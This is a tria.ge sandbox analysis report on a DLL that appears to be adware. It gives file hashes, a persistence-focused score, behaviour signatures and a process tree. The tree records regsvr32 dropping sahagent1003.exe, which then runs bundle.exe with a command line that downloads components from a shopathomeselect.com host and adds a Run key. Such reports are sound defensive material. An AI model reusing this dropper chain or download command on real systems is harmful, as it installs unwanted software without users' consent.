Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

3

d5ae71e610...d7.dll

windows7-x64

7

d5ae71e610...d7.dll

windows10-2004-x64

7

Analysis

  • max time kernel
    117s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    19/03/2024, 08:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d5ae71e6109ad99590a2b3ec2d2f55d7.dll

  • Size

    96KB

  • MD5

    d5ae71e6109ad99590a2b3ec2d2f55d7

  • SHA1

    5e1088bdcd5eca984f6546296aaae41b6180b66d

  • SHA256

    bb14e2647c19bc26b2cbaa537795aaa9cb0c3959cadfc6c78564d3603714cb86

  • SHA512

    394f03eb0ffd879d8d8fa56825b934e67e103d756ce0f71f08f7c9bd464a20e2dbc3681c9b050b229620245f3b4510fc2aeea6c31c958f282a5ebf04c362c5dc

  • SSDEEP

    1536:IflEc8naP2D22/muSD6d68BrJOx2LednhYxN0CcjwwDvx:I5g22/dBrJOMLkOf+N7x

Score
7/10
persistence

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 9 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops file in System32 directory 1 IoCs
  • Modifies registry class 10 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\d5ae71e6109ad99590a2b3ec2d2f55d7.dll
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1752
    • C:\Windows\SysWOW64\regsvr32.exe
      /s C:\Users\Admin\AppData\Local\Temp\d5ae71e6109ad99590a2b3ec2d2f55d7.dll
      2⤵
      • Loads dropped DLL
      • Drops file in System32 directory
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:2344
      • C:\Windows\SysWOW64\sahagent1003.exe
        "C:\Windows\System32\sahagent1003.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1524
        • C:\Users\Admin\AppData\Local\Temp\bundle.exe
          "C:\Users\Admin\AppData\Local\Temp\bundle.exe" download1.shopathomeselect.com/agent/mindset1003.sah#bunSetup.cab#download1.shopathomeselect.com/agent/bunSetup.cab#www.shopathomeselect.com/agent/agentprefs.sah
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          PID:2816

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • \Users\Admin\AppData\Local\Temp\bundle.exe
    Filesize

    76KB

    MD5

    12b77b012ec72a0dfdc311b0f46de641

    SHA1

    52efa989341f778626da592915048a280c1a305f

    SHA256

    ab995fdb0470311ffb79b1163e78ad4506fe89881c3fc92994bfc99b2e2351fa

    SHA512

    9f2cf0e249e1f35aea96e23e5c5f66ef83b321f0519fa0d6a5e73e25ca6977bd4ae3fd9baceba3237b602335a422b96af6e00cabf17a7ba0f7f50dd99b782a1a

    Download Submit

  • \Windows\SysWOW64\sahagent1003.exe
    Filesize

    72KB

    MD5

    82344899bc34ce448a909f5bb7c56e5c

    SHA1

    52ec80cdd38415c5d67afee75c46ef3523fb4ceb

    SHA256

    e12d3e05d4c5f68b1a116c60e6f4c1b3235fdb1a7171e44c05847ccfe3972c44

    SHA512

    ef5be92a5e85951bb5a64f471d1c9fee1fb644a1716ab147356dd811e284f3567c7e0a7457de1290d0b9ad5ea594ca4c9d670abed4dd2e3e599bc4c5cd069e8b

    Download Submit